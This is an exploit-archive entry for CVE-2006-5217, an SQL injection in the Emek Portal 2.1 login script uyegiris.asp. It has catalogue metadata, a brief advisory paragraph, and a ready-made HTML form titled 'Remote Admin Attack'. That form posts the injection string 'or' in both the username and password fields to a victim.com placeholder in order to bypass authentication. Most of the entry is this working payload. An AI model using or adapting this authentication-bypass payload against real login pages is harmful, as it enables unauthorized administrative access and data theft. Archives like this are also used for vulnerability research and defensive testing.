Emek Portal 2.1 - 'Uyegiris.asp' SQL Injection
Author: Dj ReMix
type: webapps
platform: asp
port:
date_added: 2006-10-06
date_updated: 2013-10-07
verified: 1
codes: CVE-2006-5217;OSVDB-29551
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/20378/info
Emek Portal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects version 2.1; other versions may also be vulnerable.
<title>Remote Admin Attack - BiyoSecurity.Org</title> <center> RMx - BiyoSecurtiy.Org</center> <FORM NAME=giris ACTION="http://victim.com/Path to script/uyegiris.asp" METHOD=post> <table align=center> <td>Kullanici Adi:</td><td><INPUT NAME=k_a class="input" value="'or'" SIZE=15></td> </tr><tr> <td>Sifre:</td><td><INPUT NAME=sifre TYPE=text class="input" value="'or'" SIZE=15></td> </tr><tr> <td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td> </tr></table></form>